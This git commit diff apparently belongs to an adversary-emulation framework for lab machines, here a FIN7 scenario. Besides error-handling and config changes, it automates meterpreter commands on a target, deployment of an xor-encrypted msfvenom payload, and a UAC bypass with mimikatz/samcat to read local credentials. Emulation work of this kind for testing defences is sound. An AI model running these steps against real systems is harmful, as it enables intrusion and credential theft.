Added Metasploit exception.

pull/6/head
Thorsten Sick 3 years ago
parent d36cd2896d
commit 9a25537e99

@ -50,6 +50,14 @@ class MachineConfig():
return self.raw_config["vm_name"] return self.raw_config["vm_name"]
def get_nicknames(self):
""" Gets the nicknames """
if "nicknames" in self.raw_config:
return self.raw_config["nicknames"] or []
return []
def vmcontroller(self): def vmcontroller(self):
""" Returns the vm controller. lowercase """ """ Returns the vm controller. lowercase """

@ -20,3 +20,7 @@ class CalderaError(Exception):
class NetworkError(Exception): class NetworkError(Exception):
""" Network connection (like ssh) can not be established """ """ Network connection (like ssh) can not be established """
class MetasploitError(Exception):
""" Metasploit had an error """

@ -6,6 +6,7 @@ from app.attack_log import AttackLog
from app.interface_sfx import CommandlineColors from app.interface_sfx import CommandlineColors
import time import time
import socket import socket
from app.exceptions import MetasploitError
import os import os
@ -79,7 +80,14 @@ class Metasploit():
""" """
# Get_ip can also return a network name. Matching a session needs a real ip # Get_ip can also return a network name. Matching a session needs a real ip
name_resolution_worked = True
try:
ip = socket.gethostbyname(target.get_ip()) ip = socket.gethostbyname(target.get_ip())
except socket.gaierror:
ip = target.get_ip() # Limp on feature if we can not get a name resolution
name_resolution_worked = False
print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}")
# TODO: Try to get the ip address from kali system
retries = 100 retries = 100
while retries > 0: while retries > 0:
@ -90,7 +98,7 @@ class Metasploit():
time.sleep(1) time.sleep(1)
retries -= 1 retries -= 1
return None # TODO: Better error handlign as soon as we know where we use it raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}")
def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str: def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str:
""" Executes commands on the meterpreter, returns results read from shell """ Executes commands on the meterpreter, returns results read from shell

@ -128,6 +128,9 @@ class FIN7Plugin(AttackPlugin):
# -f C : output is c code # -f C : output is c code
# --encrypt xor : xor encrypt the results # --encrypt xor : xor encrypt the results
# --encrypt-key m : the encryption key # --encrypt-key m : the encryption key
self.attacker_machine_plugin.remote_run("sudo apt install msfpc") # MSFVenom needs to be installed
venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger) venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
venom.generate_and_deploy(payload=self.payload_type_1, venom.generate_and_deploy(payload=self.payload_type_1,
architecture="x64", architecture="x64",
@ -179,11 +182,10 @@ class FIN7Plugin(AttackPlugin):
f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1)
print(metasploit.meterpreter_execute_on(["arp"], hotelmanager)) print(metasploit.meterpreter_execute_on(["arp"], hotelmanager))
# powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/ # powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
# TODO: Add real <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error # TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
# itadmin = "127.0.0.1" itadmin = self.get_target_by_name("itadmin")
# self.attack_logger.vprint( self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1)
# f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1) print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
# print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
# Copy step 5 attack tools to attacker # Copy step 5 attack tools to attacker
@ -215,7 +217,6 @@ class FIN7Plugin(AttackPlugin):
self.attack_logger.vprint( self.attack_logger.vprint(
f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1) f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1)
print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20)) print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20))
# TODO: Make it more reliable. Also test which OS versions are working properly. It worked at least once
# samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/ # samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
@ -313,8 +314,8 @@ class FIN7Plugin(AttackPlugin):
self.step1() self.step1()
self.step2() self.step2()
self.step3() # Done and works self.step3() # Done and works
self.step4() self.step4() # Partial - with a hack
self.step5() self.step5() # Done and quite ok
self.step6() self.step6()
self.step7() self.step7()
self.step8() self.step8()

@ -57,8 +57,10 @@ targets:
vm_name: target2 vm_name: target2
# TODO: itadmin must be moved to another target
nicknames: nicknames:
- hotelmanager - hotelmanager
- itadmin
os: windows os: windows
paw: target2w paw: target2w

Loading…
Cancel
Save